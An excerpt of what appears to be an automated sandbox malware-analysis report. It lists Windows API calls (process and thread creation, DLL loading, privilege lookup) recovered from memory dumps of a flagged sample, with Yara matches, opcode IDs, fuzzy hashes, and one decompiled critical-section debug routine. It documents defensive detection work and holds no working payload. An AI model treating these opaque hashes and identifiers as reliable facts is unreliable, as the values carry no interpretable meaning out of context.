                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: net.dll$wininet.dll
                                              • API String ID: 3472027048-1269752229
                                              • Opcode ID: 4c1b2e4cdb3017c86f6cdbc8616693572d40ca00311d07818c95e84a71bb04d3
                                              • Instruction ID: e0c6b64fe20a5120d08a0640e817068b04d486c163ebc15652b72e5cefc2eb1e
                                              • Opcode Fuzzy Hash: 4c1b2e4cdb3017c86f6cdbc8616693572d40ca00311d07818c95e84a71bb04d3
                                              • Instruction Fuzzy Hash: 33217C71601704ABD711DEA8D8A1FAAB7A8FB48700F00801DF61AAB381D774A555CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,008ACCE0,?,?), ref: 008B705C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread
                                              • String ID: net.dll
                                              • API String ID: 2422867632-2431746569
                                              • Opcode ID: 34efaf8831cdb30c5b1d901828abbf96756301a3e5a8eac3acc7e1cbb31c290d
                                              • Instruction ID: a5d6402d796d90908b99045bda2c16b816a9dfe565f7cd8bfbbcfe3a326c18f7
                                              • Opcode Fuzzy Hash: 34efaf8831cdb30c5b1d901828abbf96756301a3e5a8eac3acc7e1cbb31c290d
                                              • Instruction Fuzzy Hash: 6F11C0722017046AD7219A68DC62FEBB7A8FBC5710F14451EF64AEB380E675B80687E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,008A3B93), ref: 008B850D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID: .z`
                                              • API String ID: 3298025750-1441809116
                                              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                              • Instruction ID: 20ede1e983935d69c07b176f42e40129367e2a9d11ff49699af5932222b775c8
                                              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                              • Instruction Fuzzy Hash: EDE01AB1200208ABD714DF59CC45EA777ACEF88750F014555B90857241C630E910CAB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlAllocateHeap.NTDLL(008B3526,?,008B3C9F,008B3C9F,?,008B3526,?,?,?,?,?,00000000,00000000,?), ref: 008B84CD
                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 008B85A4
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateCreateHeapInternalProcess
                                              • String ID:
                                              • API String ID: 2739015735-0
                                              • Opcode ID: 773b677b6bab77761c524d6934189164ab0c06201aa1f6b2fb0bbd70b4c41e82
                                              • Instruction ID: 57b850be0ae7f5a224b77cb28568e4387ce693d9362df3392a3d3c6e26f6bff4
                                              • Opcode Fuzzy Hash: 773b677b6bab77761c524d6934189164ab0c06201aa1f6b2fb0bbd70b4c41e82
                                              • Instruction Fuzzy Hash: D02147B2204208ABCB24DF98DC81EE777ADEF8C754F158659FA0D9B241C630F911CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 008A72CA
                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 008A72EB
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
                                              • Instruction ID: 685f6f3a14b02b30bbdb8d713bf1f48b1916f517e148098fb2cb89a2763f0bcd
                                              • Opcode Fuzzy Hash: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
                                              • Instruction Fuzzy Hash: B3018431A8022877F720A6989C03FFE776CAB01B51F150515FF08FA6C1E6946A0646F6
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 008A9BA2
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                              • Instruction ID: c35e047748e5e25d089ce5446c3be00ae50625ac71a9f75b41047e7d211ff135
                                              • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                              • Instruction Fuzzy Hash: AA014CB5D0020DABDB10DAA4EC42FDEB3B8EB54308F004194E918D7241F671EA04CBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 008B85A4
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInternalProcess
                                              • String ID:
                                              • API String ID: 2186235152-0
                                              • Opcode ID: f497bde5e983975b2f8647c71344713b189404eeeeda599071133b00268b416b
                                              • Instruction ID: 9038be0fba596a4b6d6b3446e06a8cd4740d4b78eb4dcb85d8669bcb141689dc
                                              • Opcode Fuzzy Hash: f497bde5e983975b2f8647c71344713b189404eeeeda599071133b00268b416b
                                              • Instruction Fuzzy Hash: 9E019DB2210108AFCB58CF99DC80EEB77ADAF8C354F158259BA0DE7251C630E851CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 008B85A4
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInternalProcess
                                              • String ID:
                                              • API String ID: 2186235152-0
                                              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                              • Instruction ID: f23facaba6d426f90e28fefcad17b4a5bcd04d32a7c68656c7b30c1a1709c5a9
                                              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                              • Instruction Fuzzy Hash: CD01AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,008ACCE0,?,?), ref: 008B705C
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread
                                              • String ID:
                                              • API String ID: 2422867632-0
                                              • Opcode ID: 7605c94549fd1d28dc1871aeb6e7ddf134353a8e3cc3ab0d1d32422401d6de41
                                              • Instruction ID: 3c31a20b27ff65176a5fbd92558abc9be72c92f9750adfbe10a32245c8df17ed
                                              • Opcode Fuzzy Hash: 7605c94549fd1d28dc1871aeb6e7ddf134353a8e3cc3ab0d1d32422401d6de41
                                              • Instruction Fuzzy Hash: 81E06D333903043AE330659DAC02FE7B29CDB81B20F150026FA0DEA3C1D595F80142A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlAllocateHeap.NTDLL(008B3526,?,008B3C9F,008B3C9F,?,008B3526,?,?,?,?,?,00000000,00000000,?), ref: 008B84CD
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                              • Instruction ID: 33d2d9881da6dac262b4672a9c8fc6c753dc8592fbbe46b6e120e4bab7d137d6
                                              • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                              • Instruction Fuzzy Hash: 46E01AB1200208ABD714DF59CC41EA777ACEF88650F154559BA085B241C530F910CBB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,008ACFB2,008ACFB2,?,00000000,?,?), ref: 008B8670
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                              • Instruction ID: 98be86da72d51b43e5ab87e50dce5635ad6ecd615525f1a70ee5ad9d6ea53883
                                              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                              • Instruction Fuzzy Hash: 86E01AB1200208ABDB20DF49CC85EE737ADEF88650F018555BA0857241C930E8108BF5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • SetErrorMode.KERNELBASE(00008003,?,?,008A7C73,?), ref: 008AD44B
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                              • Instruction ID: a4feb2f29dd2ff907127da0273b398d2dc5bb9da00af8811cd165bf1455d9bfb
                                              • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                              • Instruction Fuzzy Hash: D3D0A7717503043BF610FAA89C03F6672CCAB49F00F494074F949D77C3D964F5004166
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 9462a56c5365b1fe7920c3be50954d8371b0dafa9d7a7310454d19cc95ef7f90
                                              • Instruction ID: c3f158cbffe681782324011edb5aa16bb8419f4a5f2411f302db49c9ffd2aa82
                                              • Opcode Fuzzy Hash: 9462a56c5365b1fe7920c3be50954d8371b0dafa9d7a7310454d19cc95ef7f90
                                              • Instruction Fuzzy Hash: 69B02BB18010C0C5F700E7604608F17390077E0300F13C611D2024340A0338D080F1B1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              C-Code - Quality: 53%
                                              			E048CFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                              				void* _t7;
                                              				intOrPtr _t9;
                                              				intOrPtr _t10;
                                              				intOrPtr* _t12;
                                              				intOrPtr* _t13;
                                              				intOrPtr _t14;
                                              				intOrPtr* _t15;
                                              
                                              				_t13 = __edx;
                                              				_push(_a4);
                                              				_t14 =  *[fs:0x18];
                                              				_t15 = _t12;
                                              				_t7 = E0487CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                              				_push(_t13);
                                              				E048C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                              				_t9 =  *_t15;
                                              				if(_t9 == 0xffffffff) {
                                              					_t10 = 0;
                                              				} else {
                                              					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                              				}
                                              				_push(_t10);
                                              				_push(_t15);
                                              				_push( *((intOrPtr*)(_t15 + 0xc)));
                                              				_push( *((intOrPtr*)(_t14 + 0x24)));
                                              				return E048C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                              			}

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 048CFDFA
                                              Strings
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 048CFE2B
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 048CFE01
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                              • API String ID: 885266447-3903918235
                                              • Opcode ID: 605522a0dd70d6945dde57a4cabd0fde6adfc4129ab3261a67748569c2962b06
                                              • Instruction ID: 6295d618810b006220675eb6e9af9ca639fe96f2a550b802e2b20bd5b90019ed
                                              • Opcode Fuzzy Hash: 605522a0dd70d6945dde57a4cabd0fde6adfc4129ab3261a67748569c2962b06
                                              • Instruction Fuzzy Hash: 67F0FC32640111FFEA201A45DC05F237B5ADB44730F144718F724965D1DAB2F86096F5
                                              Uniqueness

                                              Uniqueness Score: -1.00%